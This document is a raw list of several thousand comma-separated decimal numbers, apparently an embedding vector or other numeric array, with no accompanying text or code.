0.013837211765348911, 0.01647324487566948, -0.012835989706218243, -0.023810330778360367, -0.008901496417820454, 0.0002945491869468242, -0.017286738380789757, -0.013453931547701359, 0.027658779174089432, 0.032007843255996704, 0.00497091468423605, -0.04959181696176529, 0.05444148927927017, -0.028237611055374146, 0.02265266515314579, -0.054848235100507736, -0.03213299438357353, 0.02606308087706566, -0.005049135535955429, -0.03876609727740288, -0.0003967247612308711, -0.05062432959675789, 0.025452960282564163, -0.03385384753346443, -0.018741639330983162, -0.010747500695288181, 0.0027005637530237436, -0.02027476206421852, 0.026329031214118004, -0.0007685167365707457, -0.024420449510216713, -0.02916061505675316, -0.0023329274263232946, 0.02578148804605007, 0.004321684595197439, 0.011044738814234734, 0.03660720959305763, -0.0033673939760774374, 0.022605733945965767, -0.013923254795372486, 0.0035531676840037107, -0.011662681587040424, -0.011044738814234734, 0.04173847660422325, -0.004165243357419968, 0.005326818209141493, 0.0036704984959214926, 0.027674423530697823, -0.0025108789559453726, -0.0011625526240095496, -0.011834766715765, 0.03557469695806503, -0.017583975568413734, -0.00028648271108977497, -0.04139430448412895, 0.02524958737194538, 0.008659012615680695, -0.002190175000578165, 0.011435842141509056, 0.0022664398420602083, 0.024999281391501427, 0.0017922279657796025, -0.013539973646402359, 0.023309718817472458, -0.007743832655251026, 0.016864346340298653, -0.029802022501826286, 0.022261563688516617, 0.003318506060168147, 0.030459074303507805, -0.021886104717850685, -0.0018616486340761185, 0.014290891587734222, -0.025202656164765358, -0.004873139318078756, 0.009988761506974697, 0.019117098301649094, 0.029113681986927986, -0.014807146973907948, -0.0017961389385163784, 0.011052560992538929, -0.020837949588894844, 0.023090701550245285, -0.01628551445901394, -0.0041535100899636745, 0.005987781565636396, -0.007603035774081945, -0.010958696715533733, -0.020978746935725212, -0.05171941593289375, 0.06054269149899483, -0.03000539541244507, 0.0015624550869688392, 0.00686776265501976, 0.012413598597049713, -0.012030317448079586, 0.015917878597974777, -0.029082393273711205, 0.005362017545849085, -0.008353953249752522, 0.022245919331908226, 0.002978246659040451, -0.03142901137471199, -0.011975563131272793, -0.012460530735552311, -0.04020535200834274, 0.002542167203500867, 0.006515770219266415, 0.018115874379873276, -0.006992915645241737, -0.015143495053052902, 0.024076279252767563, -0.001259350567124784, -0.04176976531744003, -0.02418578788638115, 0.02354438044130802, 0.011435842141509056, 0.00791200716048479, -0.015910055488348007, 0.023779042065143585, 0.004775363486260176, 0.020509423688054085, 0.04696360602974892, 0.009785388596355915, -0.004791007377207279, 0.016441956162452698, 0.03178882226347923, 0.02212076634168625, -0.010434619151055813, 0.01339135505259037, 0.013234914280474186, -0.04361576959490776, 0.015120028518140316, -0.011036916635930538, 0.00751308212056756, 0.0229811929166317, -0.00043950160034000874, 0.002772917738184333, -0.008432173170149326, -0.015526775270700455, -0.03360354155302048, 0.026813998818397522, 0.0076812561601400375, -0.018413113430142403, 0.004169154446572065, 0.023231497034430504, 0.026235166937112808, -0.022746531292796135, 0.0054910811595618725, -0.02163579873740673, -0.0013874366413801908, -0.009425573982298374, -0.016551464796066284, 0.000714740133844316, -0.02301247976720333, -0.0025069680996239185, 0.0003849916683975607, 0.00450550252571702, 0.035261817276477814, 0.002880471060052514, -0.033196792006492615, -0.0029508695006370544, 0.002600832609459758, 0.007743832655251026, 0.004802740644663572, 0.00398729182779789, 0.041613321751356125, 0.05566173046827316, 0.00011800300853792578, -0.016614040359854698, -0.025546826422214508, -0.01784992590546608, -0.013860678300261497, 0.006144222803413868, 0.027205100283026695, -0.0025695443619042635, -0.04518017917871475, 0.002348571550101042, 0.025280876085162163, 0.007239310070872307, 0.0007122957031242549, -0.03266489505767822, 0.010669280774891376, 0.032852623611688614, -0.01576926000416279, -0.027674423530697823, 0.00876070000231266, 0.022355427965521812, -0.03332194685935974, 0.005811785347759724, 0.007231488358229399, -0.022730886936187744, -0.014189204201102257, 0.016191650182008743, -0.030678093433380127, 0.004376438912004232, -0.010145203210413456, 0.0015341001562774181, -0.009871430695056915, -0.05253290757536888, 0.04033050686120987, 0.0034964578226208687, 0.04862188175320625, 0.02074408531188965, -0.009472506120800972, -0.01750575564801693, 0.022230274975299835, -0.003435836872085929, -0.0019965791143476963, -0.014181382022798061, -0.0020337337628006935, 0.014619417488574982, -0.004044001456350088, -0.015526775270700455, 0.007872896268963814, 0.0377022959291935, -0.0016308980993926525, 0.003993158228695393, 0.03120999224483967, 0.00472452025860548, -0.006500126328319311, 0.008838919922709465, -0.027596203610301018, 0.021714020520448685, 0.009965295903384686, -0.007309708744287491, 0.001592765562236309, -0.012288445606827736, -0.0071415347047150135, -0.008174045942723751, -0.01681741513311863, -0.03532439097762108, -0.019351759925484657, -0.027502339333295822, 0.008033248595893383, -0.006003425922244787, -0.013344422914087772, 0.005060868337750435, 0.012202402576804161, 0.000050415575969964266, -0.03238330036401749, -0.035950157791376114, 0.005565390922129154, 0.004008802119642496, -0.015550241805613041, -0.0037037422880530357, 0.0019252027850598097, -0.0022840395104140043, -0.0028843821492046118, 0.029238834977149963, 0.014431688003242016, 0.004841851070523262, -0.006429727654904127, -0.015917878597974777, 0.0016484976513311267, -0.003431925782933831, 0.0004270352073945105, 0.012327555567026138, -0.024451738223433495, 0.008510394021868706, 0.0008750922279432416, 0.0011126870522275567, 0.002804205985739827, -0.039423149079084396, -0.006449282635003328, 0.007321441546082497, 0.023278430104255676, -0.008737233467400074, -0.013782457448542118, 0.007790764793753624, 0.00416133226826787, 0.006273286417126656, -0.0009220245410688221, 0.02967686951160431, 0.011568816378712654, -0.02417014352977276, 0.031851399689912796, -0.03829677402973175, 0.018491333350539207, 0.008752877824008465, 0.005764853209257126, -0.017615264281630516, -0.013758991844952106, -0.006773897912353277, 0.049529239535331726, -0.014987054280936718, -0.02041555941104889, 0.019711574539542198, 0.017302380874753, 0.032508451491594315, -0.028785156086087227, 0.015323402360081673, -0.035449545830488205, 0.00553410267457366, -0.004059645812958479, -0.026313386857509613, 0.012726480141282082, -0.01885114796459675, -0.009316065348684788, -0.00021082877356093377, -0.005119533743709326, -0.01551895309239626, 0.03394770994782448, -0.013563440181314945, -0.017067719250917435, -0.042990002781152725, 0.017818637192249298, -0.0034456143621355295, -0.03180446848273277, -0.005581034813076258, 0.032852623611688614, 0.009761922061443329, -0.024592535570263863, -0.025171367451548576, -0.017302380874753, -0.020180897787213326, 0.004055734723806381, 0.03616917505860329, -0.04446054995059967, 0.009378641843795776, -0.007837696932256222, -0.016191650182008743, 0.032007843255996704, 0.016035208478569984, 0.026720134541392326, 0.0024483026936650276, -0.007657790090888739, 0.012898565270006657, -0.0024717687629163265, 0.027205100283026695, -0.015472020953893661, 0.019680285826325417, -0.00291958125308156, -0.04902862757444382, 0.035950157791376114, 0.005322907119989395, 0.026657557114958763, 0.0056631662882864475, 0.007962849922478199, 0.008635547012090683, -0.0048574949614703655, 0.0066683003678917885, 0.00883109774440527, 0.034604761749506, -0.016692262142896652, 0.015886589884757996, 0.026688845828175545, 0.0022019080352038145, -0.022715242579579353, 0.04414766654372215, -0.02401370368897915, -0.013985831290483475, -0.02420143224298954, -0.016254225745797157, -0.008103647269308567, -0.01907016523182392, 0.01270301453769207, -0.019946236163377762, 0.017411889508366585, -0.007626501843333244, 0.021369848400354385, 0.011991207487881184, -0.015691038221120834, 0.017802992835640907, 0.009511617012321949, -0.00987925287336111, -0.011381087824702263, -0.013758991844952106, 0.031178703531622887, -0.005498903337866068, 0.045931097120046616, 0.009409929625689983, -0.01869470626115799, -0.014384755864739418, 0.004024446476250887, 0.009339531883597374, 0.0008775366004556417, -0.02352873608469963, -0.010872653685510159, -0.01511220633983612, 0.00951943825930357, -0.02043120376765728, 0.005056957248598337, 0.014728926122188568, -0.02812810242176056, -0.008095825091004372, 0.0024072369560599327, 0.006124667823314667, 0.007947205565869808, 0.027173813432455063, -0.016191650182008743, 0.015260825864970684, 0.002387681743130088, 0.00919091235846281, 0.04533661901950836, -0.02817503549158573, 0.014564663171768188, -0.019023234024643898, -0.03867223113775253, -0.010231245309114456, 0.008964072912931442, 0.007200200110673904, -0.03189833462238312, -0.01328966859728098, 0.026031792163848877, 0.02884773164987564, 0.0000037735296700702747, -0.030975330621004105, -0.043866075575351715, -0.017302380874753, -0.017427533864974976, -0.023810330778360367, -0.017787348479032516, 0.00002374115319980774, -0.027392830699682236, -0.018256671726703644, 0.03194526582956314, 0.01784992590546608, -0.01262479368597269, 0.012749946676194668, 0.017928145825862885, 0.01157663855701685, -0.0038093398325145245, -0.024858485907316208, -0.002989979926496744, -0.0032168193720281124, -0.014384755864739418, -0.006500126328319311, -0.014783680438995361, 0.03713911026716232, -0.02143242582678795, 0.008267910219728947, -0.01835053600370884, 0.03144465386867523, 0.0037936957087367773, -0.029942819848656654, -0.017130296677350998, 0.02005574479699135, -0.010833543725311756, 0.006507948040962219, 0.007204111199826002, -0.007403573486953974, 0.006120756734162569, 0.008612080477178097, -0.000403080164687708, -0.008377418853342533, -0.021056966856122017, -0.016879990696907043, -0.007055492140352726, -0.0203999150544405, 0.000978245516307652, 0.016207294538617134, 0.01562846265733242, 0.01030164398252964, -0.016598396003246307, 0.01365730445832014, -0.009112691506743431, -0.004877049941569567, -0.025797130540013313, -0.01520607154816389, -0.02454560250043869, -0.03607530891895294, 0.0006154978182166815, -0.03626303747296333, -0.02626645378768444, 0.03213299438357353, -0.02233978360891342, -0.006066002417355776, -0.006429727654904127, 0.011881698854267597, 0.006715232506394386, 0.005627967417240143, 0.003379127010703087, -0.018115874379873276, 0.03419801592826843, 0.020806660875678062, -0.06057398021221161, 0.006378884427249432, -0.0262508112937212, -0.007360551971942186, -0.0034221482928842306, -0.01871035061776638, 0.004196531604975462, 0.03213299438357353, -0.005209487397223711, 0.014908833429217339, -0.002293817000463605, -0.015589351765811443, 0.0030779780354350805, -0.004638477694243193, -0.009308243170380592, -0.0004514791362453252, 0.044867295771837234, -0.04395993798971176, 0.004622833337634802, -0.011897343210875988, 0.011201180517673492, 0.01226497907191515, -0.013876322656869888, -0.023904195055365562, -0.0012349066091701388, -0.0002507945755496621, 0.01941433548927307, -0.029082393273711205, 0.0038112953770905733, -0.0023544379509985447, -0.01700514368712902, -0.010364220477640629, -0.018835503607988358, -0.034229304641485214, -0.0264228954911232, -0.036638498306274414, 0.014619417488574982, 0.010153025388717651, 0.025875352323055267, 0.002154975663870573, 0.02972380258142948, 0.00848692748695612, -0.025703266263008118, -0.0018645819509401917, -0.01167832501232624, -0.00199560122564435, 0.01106820534914732, 0.008510394021868706, 0.02110389992594719, 0.014955765567719936, -0.010520661249756813, 0.013250557705760002, 0.05150039866566658, 0.0397673174738884, -0.030615516006946564, 0.013352245092391968, -0.021213408559560776, -0.01458030752837658, 0.011506239883601665, 0.024967994540929794, -0.0036744095850735903, -0.0198836587369442, 0.03363483026623726, 0.02628209814429283, 0.007110246457159519, 0.020290406420826912, 0.014197026379406452, 0.010458084754645824, -0.014165738597512245, -0.012890744023025036, 0.025312164798378944, -0.033228080719709396, -0.022558800876140594, 0.019774150103330612, 0.03105355054140091, 0.012961141765117645, -0.056725528091192245, -0.005475437268614769, 0.0022097299806773663, 0.01924225129187107, 0.011952097527682781, 0.004431193228811026, -0.01219458132982254, -0.003263751743361354, 0.01399365346878767, 0.004540701862424612, 0.05591203644871712, -0.018256671726703644, 0.008361774496734142, 0.0017228071810677648, 0.002551944926381111, -0.013156693428754807, 0.025890996679663658, 0.003144465386867523, -0.028081171214580536, -0.03178882226347923, 0.009464683942496777, -0.030083617195487022, -0.005948671605437994, -0.0245299581438303, -0.005921294447034597, 0.008174045942723751, -0.0035609896294772625, 0.014595950953662395, 0.00892496295273304, 0.004955270793288946, -0.025124434381723404, -0.012006851844489574, 0.030599871650338173, -0.023622600361704826, 0.00356490071862936, 0.006406261585652828, -0.009605481289327145, -0.01286727748811245, -0.003995113540440798, -0.01731802523136139, -0.008784165605902672, 0.004231730941683054, -0.03860965371131897, -0.00162112049292773, 0.006363240070641041, -0.026188233867287636, 0.01535469014197588, -0.008134935051202774, -0.018679063767194748, -0.013891966082155704, 0.004982647951692343, -0.0008711811969988048, -0.04133173078298569, 0.006167688872665167, 0.031006619334220886, 0.11476516723632812, 0.004458570387214422, -0.002460035728290677, -0.0015624550869688392, -0.01733366958796978, 0.024498671293258667, -0.014854079112410545, 0.0031014441046863794, 0.015503309667110443, 0.019179673865437508, 0.03034956566989422, 0.008541681803762913, -0.001000245101749897, 0.0009674901957623661, -0.00257541099563241, 0.009159624576568604, -0.0086511904373765, -0.0024913239758461714, 0.010176490992307663, -0.021698376163840294, 0.00935517530888319, -0.0006751409382559359, 0.007125890348106623, -0.02280910685658455, 0.02967686951160431, -0.019336115568876266, -0.019774150103330612, -0.015542419627308846, -0.029911531135439873, -0.009636769071221352, -0.009589836932718754, 0.015401622280478477, 0.00035761448089033365, -0.006578346714377403, 0.013039362616837025, -0.01562846265733242, 0.009159624576568604, 0.002540211658924818, -0.010661458596587181, -0.030302634462714195, 0.0020141787827014923, -0.034229304641485214, -0.030990974977612495, 0.0025617224164307117, -0.01666097342967987, -0.024639466777443886, 0.023466158658266068, -0.007028114981949329, -0.003222686005756259, 0.008791987784206867, -0.0022390626836568117, -0.023747753351926804, 0.013579084537923336, 0.03189833462238312, 0.00908922590315342, 0.007317530922591686, -0.004114400129765272, 0.0003302372933831066, -0.011224646121263504, -0.014220492914319038, -0.0033713048323988914, 0.013868500478565693, 0.009840142913162708, 0.012045961804687977, -0.0023603045847266912, -0.01578490249812603, -0.036482054740190506, -0.0026810087729245424, -0.006726965773850679, 0.019789794459939003, 0.013305312022566795, 0.006046446971595287, 0.011255934834480286, 0.011201180517673492, -0.0004253241349942982, 0.02571891061961651, -0.015730148181319237, 0.013516508042812347, -0.037858735769987106, -0.00682865222916007, 0.027189455926418304, 0.022574445232748985, 0.009237844496965408, 0.024655111134052277, -0.01993059180676937, 0.035793714225292206, -0.0007074069580994546, 0.01582401432096958, -0.019508199766278267, 0.008870208635926247, -0.009222201071679592, -0.005471526179462671, -0.0027357630897313356, 0.022949904203414917, -0.0001571743778185919, 0.03842192515730858, 0.007297975476831198, -0.012288445606827736, -0.014494264498353004, -0.007736010476946831, 0.012656082399189472, 0.014721103943884373, 0.03707653284072876, -0.010950874537229538, -0.0029469586443156004, -0.00036812538746744394, -0.02349744737148285, 0.007829875685274601, 0.013117583468556404, -0.02268395386636257, -0.024639466777443886, -0.01700514368712902, -0.004571990109980106, -0.04308386892080307, 0.0063319518230855465, -0.006820830516517162, 0.017286738380789757, 0.007239310070872307, -0.020728440955281258, -0.03072502464056015, -0.017912501469254494, -0.011764368042349815, 0.026876574382185936, -0.011138604022562504, -0.00118113006465137, 0.011873876675963402, 0.0034553920850157738, -0.015307758003473282, 0.040612101554870605, 0.028722578659653664, 0.028425341472029686, -0.004075289703905582, 0.005940849427133799, -0.024436093866825104, 0.034792494028806686, -0.027705712243914604, 0.0315854512155056, 0.022261563688516617, 0.0005788319394923747, -0.006335862912237644, -0.005471526179462671, 0.03175753727555275, 0.015495487488806248, 0.002995846327394247, 0.00604253588244319, 0.006468838080763817, 0.03247716650366783, 0.008088002912700176, 0.019805438816547394, 0.009824498556554317, -0.00944904051721096, -0.030302634462714195, 0.005991692654788494, 0.024436093866825104, -0.000577365281060338, 0.005522369407117367, 0.01502616424113512, -0.017943790182471275, -0.022089477628469467, -0.0014646794879809022, 0.017458822578191757, 0.010129558853805065, 0.02726767770946026, 0.01167832501232624, 0.001738451304845512, 0.02404499240219593, -0.003924715332686901, -0.056037187576293945, -0.025797130540013313, -0.027001727372407913, -0.00553410267457366, 0.011451485566794872, -0.024498671293258667, 0.004661943763494492, 0.02524958737194538, 0.014854079112410545, -0.011099493131041527, -0.007133712526410818, 0.023043768480420113, -0.00203960039652884, -0.00206111092120409, 0.0015028120251372457, 0.0017501844558864832, -0.015870945528149605, 0.019148387014865875, -0.03039649873971939, 0.006480570882558823, 0.019351759925484657, -0.02230849489569664, 0.027596203610301018, 0.009816676378250122, 0.0205719992518425, -0.024670755490660667, 0.00019298472034279257, -0.012476175092160702, -0.008283554576337337, 0.0028922040946781635, -0.01888243667781353, -0.007653879001736641, 0.008909318596124649, -0.01819409616291523, -0.0025284786242991686, -0.012476175092160702, -0.009636769071221352, 0.010098271071910858, -0.02320021018385887, -0.01278905663639307, 0.006601812783628702, 0.0009176246239803731, -0.00899536069482565, -0.02542167343199253, 0.020478134974837303, 0.004998291842639446, 0.014963587746024132, 0.01888243667781353, -0.009488150477409363, 0.00850257184356451, -0.023841617628932, -0.016379378736019135, 0.021244697272777557, -0.006120756734162569, 0.00583525188267231, 0.012554395012557507, 0.004309951327741146, -0.028065526857972145, 0.0050530461594462395, 0.03657592087984085, -0.023841617628932, -0.02382597327232361, 0.0031835755798965693, -0.03569985181093216, -0.00775947654619813, 0.023106345906853676, 0.018397469073534012, 0.00010798100265674293, -0.027893440797924995, 0.013461753726005554, 0.005021757911890745, 0.011717435903847218, -0.03316550701856613, 0.001688585733063519, -0.006007337011396885, -0.007231488358229399, -0.0017110741464421153, 0.0010246889432892203, -0.0003004157333634794, 0.014408222399652004, 0.009222201071679592, -0.004528968594968319, 0.023309718817472458, -0.007153267506510019, -0.016395023092627525, -0.001449035364203155, 0.01664532907307148, -0.0009982895571738482, 0.037858735769987106, 0.014400400221347809, -0.01752140000462532, 0.007442683447152376, -0.009276955388486385, 0.00686776265501976, -0.031475942581892014, -0.006871673744171858, 0.015284291468560696, -0.016504531726241112, 0.04683845490217209, -0.012820345349609852, -0.008643369190394878, 0.011099493131041527, 0.013406999409198761, 0.00311122159473598, -0.008095825091004372, 0.00032217081752605736, -0.02196432463824749, 0.0005455882055684924, -0.012593505904078484, 0.003547301050275564, -0.024154501035809517, -0.013180159963667393, 0.00016585197590757161, -0.009934007190167904, 0.05228260159492493, 0.011733079329133034, -0.015878768637776375, 0.013665126636624336, -0.0179907213896513, -0.04380349814891815, 0.0004348572692833841, -0.005502814427018166, 0.002741629723459482, -0.009934007190167904, 0.009918363764882088, 0.0036528988275676966, -0.024451738223433495, 0.024076279252767563, -0.00029186037136241794, -0.023387938737869263, 0.02726767770946026, -0.05703841149806976, -0.001660230802372098, 0.019492557272315025, 0.010927408002316952, 0.001374725834466517, 0.005784408189356327, 0.005866539664566517, -0.0011488640448078513, -0.008909318596124649, -0.01492447778582573, 0.011537528596818447, 0.001176241203211248, 0.017724772915244102, -0.0023935483768582344, 0.0012368621537461877, -0.03557469695806503, 0.000386702740797773, -0.010817899368703365, -0.013493041507899761, -0.004431193228811026, -0.014908833429217339, -0.006695677526295185, 0.020040100440382957, 0.007262776605784893, -0.035074084997177124, -0.01193645317107439, -0.00876070000231266, -0.0026066992431879044, 0.0017726727528497577, 0.015065274201333523, 0.000710340216755867, -0.01869470626115799, 0.023966770619153976, 0.008494749665260315, 0.032696183770895004, -0.004044001456350088, -0.01835053600370884, -0.009081403724849224, -0.0017883168766275048, 0.015706682577729225, -0.009636769071221352, 0.002769006881862879, -0.039047688245773315, 0.03789002448320389, -0.010098271071910858, 0.008025426417589188, 0.03726426139473915, -0.004923982545733452, 0.01328966859728098, -0.005166466347873211, -0.0008482038974761963, -0.0013189937453716993, -0.021729663014411926, -0.0018020054558292031, -0.002460035728290677, 0.01355561800301075, 0.004701054189354181, 0.014204848557710648, 0.00006874851533211768, 0.004071378614753485, -0.012640438042581081, -0.0145881287753582, -0.023998059332370758, 0.00015277447528205812, -0.0033634828869253397, -0.0058626290410757065, -0.005029580090194941, 0.0029645580798387527, -0.018068943172693253, 0.0033634828869253397, 0.018115874379873276, -0.02230849489569664, -0.007067224942147732, 0.0005802985979244113, 0.013438287191092968, 0.0026399430353194475, -0.014290891587734222, -0.0032148638274520636, 0.026016149669885635, -0.018772928044199944, -0.04101884737610817, 0.01764655113220215, -0.0046854098327457905, 0.00149010110180825, -0.0018792483024299145, 0.008048892952501774, -0.036794938147068024, -0.0031953086145222187, -0.020337337628006935, 0.006746520753949881, -0.021510645747184753, -0.002442436059936881, 0.0022605734411627054, -0.013508685864508152, 0.011639215052127838, 0.04277098551392555, 0.0009767789160832763, 0.016191650182008743, 0.01544855535030365, 0.006883407011628151, -0.015417266637086868, -0.009801032952964306, 0.01373552531003952, 0.008189689368009567, -0.005322907119989395, 0.017928145825862885, -0.005948671605437994, 0.004912249278277159, -0.022449292242527008, -0.020384270697832108, 0.02263702265918255, -0.0006238087662495673, 0.02778393216431141, 0.003836716990917921, 0.020540712401270866, -0.007493527140468359, 0.0008340264321304858, -0.0031561984214931726, -0.023215854540467262, 0.0019525800598785281, -0.010614526458084583, 0.001965290866792202, 0.007935472764074802, -0.008885852061212063, -0.014126627705991268, -0.040612101554870605, 0.015166960656642914, -0.023294074460864067, 0.017192872241139412, -0.01159228291362524, 0.009542904794216156, -0.00017184072930831462, -0.005870450753718615, 0.013766814023256302, 0.015620640479028225, -0.007434861734509468, 0.01141237560659647, 0.00069714046549052, -0.008526038378477097, -0.009495972655713558, -0.0029821577481925488, -0.008424350991845131, 0.01142801996320486, -0.014525553211569786, -0.0006839407724328339, 0.019351759925484657, 0.014400400221347809, -0.015683216974139214, 0.004618922248482704, 0.0013483264483511448, -0.0023720376193523407, -0.004689320921897888, 0.02096310257911682, 0.0017228071810677648, -0.0012573950225487351, 0.02179224044084549, -0.006832563318312168, -0.0003725252754520625, 0.00910487025976181, 0.02196432463824749, 0.000901980500202626, 0.0015389890177175403, 0.009910541586577892, -0.014251780696213245, 0.028378408402204514, -0.005084334407001734, 0.015425088815391064, 0.004392082802951336, -0.007262776605784893, 0.0005353217711672187, -0.004751897417008877, -0.019602065905928612, 0.010747500695288181, -0.009785388596355915, 0.006105112377554178, -0.003400637535378337, 0.009675879962742329, -0.022230274975299835, 0.0024150589015334845, -0.020165253430604935, 0.01208507176488638, 0.005248597823083401, 0.015831835567951202, 0.0050530461594462395, 0.00017990721971727908, 0.019946236163377762, -0.006961627397686243, 0.04108142480254173, 0.0030506006442010403, 0.01803765445947647, 0.009042293764650822, -0.004002935718744993, 0.008729411289095879, -0.0064727491699159145, -0.006945983041077852, 0.013954542577266693, 0.011693969368934631, 0.017427533864974976, 0.009316065348684788, 0.01270301453769207, 0.02709559164941311, -0.009722812101244926, 0.005635789129883051, -0.014908833429217339, 0.007090691011399031, -0.007102424278855324, 0.017959434539079666, -0.009621125645935535, -0.008033248595893383, 0.009167446754872799, 0.014275247231125832, -0.013672948814928532, 0.009316065348684788, -0.001344415359199047, -0.008862386457622051, 0.002688830718398094, 0.00557321310043335, 0.010239067487418652, -0.01631680317223072, 0.009902719408273697, -0.012045961804687977, -0.01733366958796978, 0.0031033996492624283, 0.013344422914087772, -0.008619902655482292, -0.005749209318310022, -0.012483997270464897, 0.014619417488574982, 0.01201467402279377, 0.012734302319586277, -0.009636769071221352, 0.004630655515938997, 0.0023955036886036396, -0.015604996122419834, -0.0034866800997406244, -0.02197996899485588, 0.013516508042812347, 0.005017847288399935, 0.018272316083312035, -0.018600841984152794, -0.0005108778714202344, -0.017130296677350998, 0.014564663171768188, 0.011435842141509056, -0.009143980219960213, 0.010348576121032238, -0.006820830516517162, -0.005956493318080902, 0.011920808814466, -0.009167446754872799, -0.029989751055836678, -0.003162065055221319, 0.009464683942496777, 0.0022019080352038145, 0.0017228071810677648, -0.022574445232748985, 0.005299441050738096, 0.001762895262800157, -0.011928630992770195, -0.006312396842986345, 0.005811785347759724, 0.016269870102405548, -0.015917878597974777, -0.006069913040846586, 0.009308243170380592, 0.0005851873429492116, 0.0034964578226208687, 0.022042546421289444, -0.0014265469508245587, 0.005146910902112722, 0.00024346139980480075, -0.014877544716000557, -0.0185069777071476, 0.0036137886345386505, -0.014220492914319038, 0.012092893943190575, -0.0039462256245315075, 0.0035375235602259636, -0.005142999812960625, -0.011537528596818447, 0.014032763428986073, -0.014713281765580177, 0.03072502464056015, -0.009136158041656017, -0.023653889074921608, -0.017130296677350998, -0.014095339924097061, -0.02864435873925686, 0.020822305232286453, -0.01974286139011383, -0.020540712401270866, -0.004517235793173313, 0.01028599962592125, 0.015151317231357098, -0.01647324487566948, -0.010473729111254215, -0.0046150111593306065, -0.0198836587369442, -0.012202402576804161, -0.013524330221116543, 0.0015712549211457372, 0.014024941250681877, -0.005538013763725758, 0.0138997882604599, -0.009386464022099972, -0.00791200716048479, 0.0068755848333239555, 0.0017883168766275048, 0.011295044794678688, -0.0031503320205956697, 0.005209487397223711, -0.022089477628469467, 0.0020552445203065872, -0.005240775644779205, 0.0008472261251881719, -0.013946720398962498, -0.00024419472902081907, -0.005002202931791544, 0.005600590258836746, -0.011271578259766102, -0.01564410701394081, -0.04737035557627678, 0.010207779705524445, 0.010364220477640629, 0.008932785131037235, 0.01468199398368597, 0.013766814023256302, 0.004020535387098789, -0.006672211457043886, -0.012343199923634529, -0.006664389278739691, -0.015894411131739616, 0.0007054514135234058, 0.024123212322592735, 0.020884882658720016, 0.009926185943186283, -0.012390132062137127, 0.009511617012321949, -0.011529706418514252, -0.007262776605784893, -0.00614031171426177, -0.008205333724617958, -0.006308485753834248, -0.009003182873129845, 0.014822790399193764, -0.0013874366413801908, -0.014627239666879177, -0.002352482406422496, 0.01088829804211855, -0.013461753726005554, -0.0021021768916398287, 0.010864831507205963, 0.0031014441046863794, 0.014728926122188568, 0.0011038872180506587, 0.024076279252767563, 0.0016954300226643682, -0.00951943825930357, -0.0019789794459939003, -0.008791987784206867, 0.01030164398252964, 0.02058764360845089, 0.018804216757416725, 0.008001960813999176, -0.005248597823083401, 0.006844296585768461, 0.006312396842986345, 0.0015761436661705375, 0.0017355181043967605, 0.017083363607525826, 0.012124182656407356, 0.014901011250913143, -0.005479348357766867, 0.0029489139560610056, -0.004834028892219067, 0.006281108595430851, -0.001431435695849359, 0.002708385931327939, -0.018397469073534012, -0.0014549018815159798, -0.01800636574625969, 0.0018763149855658412, -0.00004613789133145474, -0.00788071844726801, 0.009034471586346626, 0.00919091235846281, 0.002954780589789152, -0.015589351765811443, -0.017083363607525826, -0.004509413614869118, -0.01483061257749796, 0.0022820839658379555, 0.013500863686203957, 0.004313862416893244, 0.01072403509169817, -0.015996098518371582, -0.008729411289095879, -0.04051823541522026, -0.01167832501232624, 0.013852856121957302, 0.002536300802603364, -0.0037624076940119267, 0.013414821587502956, -0.010598882101476192, 0.0022234185598790646, 0.008870208635926247, -0.011271578259766102, 0.007587391417473555, 0.01938304863870144, -0.006249820347875357, -0.001183085492812097, -0.01012173667550087, 0.008095825091004372, -0.004388171713799238, 0.003336105728521943, -0.0008071381016634405, 0.008956250734627247, 0.006652656011283398, 0.005455882288515568, -0.02695479616522789, 0.008455639705061913, -0.01177219022065401, -0.0068403854966163635, 0.01714594103395939, -0.003574678208678961, -0.02571891061961651, -0.00011696414003381506, 0.016050852835178375, -0.012828167527914047, -0.014595950953662395, -0.02607872523367405, -0.000758250302169472, 0.01802201010286808, 0.00987925287336111, 0.03401028737425804, -0.006390617229044437, -0.000020624554963433184, 0.012304089963436127, 0.008393063209950924, -0.006144222803413868, -0.0019662685226649046, 0.00034832581877708435, 0.04683845490217209, 0.015339046716690063, -0.008909318596124649, -0.002154975663870573, 0.004270840901881456, -0.008870208635926247, -0.003836716990917921, 0.005901739001274109, -0.02044684626162052, 0.01885114796459675, -0.022543156519532204, -0.0012261068914085627, -0.012577861547470093, 0.02007138915359974, 0.010332932695746422, -0.005334640387445688, 0.005264241714030504, 0.014189204201102257, 0.007118068169802427, -0.012898565270006657, 0.005401127506047487, 0.013579084537923336, 0.025296520441770554, 0.00497091468423605, 0.012781234458088875, -0.0009352242341265082, 0.008463461883366108, -0.01853826642036438, -0.018256671726703644, -0.019164029508829117, 0.004939626436680555, -0.0012632615398615599, 0.02609436959028244, -0.016786126419901848, 0.0029528250452131033, 0.00708678038790822, 0.022089477628469467, -0.02144807018339634, 0.0013307267799973488, -0.0145020866766572, 0.016254225745797157, -0.01750575564801693, -0.0015614773146808147, 0.006488393060863018, 0.03347838670015335, 0.00541286077350378, 0.005803963635116816, 0.01019995752722025, 0.005608411971479654, -0.036325614899396896, 0.01303154043853283, 0.000777805398683995, -0.004611100535839796, 0.001156686106696725, 0.0035218794364482164, -0.012961141765117645, -0.001984846079722047, 0.00343388132750988, -0.013547795824706554, -0.018460044637322426, 0.004286485258489847, -0.006723054684698582, -0.004055734723806381, 0.017458822578191757, 0.01631680317223072, 0.02423272095620632, 0.004517235793173313, 0.0028550494462251663, 0.002905892673879862, 0.00019799571600742638, -0.012382309883832932, 0.004466392565518618, -0.03482377901673317, 0.0012661948567256331, 0.009550726972520351, -0.0023935483768582344, -0.014807146973907948, 0.019711574539542198, 0.03275875747203827, 0.0006047424976713955, -0.0007763387984596193, 0.008455639705061913, 0.004372527822852135, -0.010684924200177193, -0.0054910811595618725, -0.019492557272315025, 0.013195803388953209, -0.028221968561410904, 0.015088740736246109, -0.007736010476946831, -0.012382309883832932, 0.008565148338675499, 0.008369596675038338, -0.019148387014865875, -0.0132114477455616, -0.0009508683579042554, 0.006621368229389191, -0.016504531726241112, -0.023434871807694435, 0.025812774896621704, -0.01731802523136139, 0.012859455309808254, 0.01030164398252964, 0.009065759368240833, 0.007798586972057819, -0.026375962421298027, -0.014564663171768188, -0.015151317231357098, 0.002401370322331786, -0.013172337785363197, 0.0010882430942729115, 0.006648745387792587, -0.007763387635350227, 0.007614768575876951, 0.014204848557710648, -0.010669280774891376, 0.015831835567951202, -0.03463605046272278, -0.013422642834484577, 0.0007553169853053987, 0.0252182986587286, -0.0006863851449452341, 0.013070650398731232, -0.017928145825862885, -0.004450748208910227, -0.011889521032571793, 0.006887317635118961, -0.0007602057885378599, -0.025280876085162163, -0.007540459278970957, 0.01520607154816389, 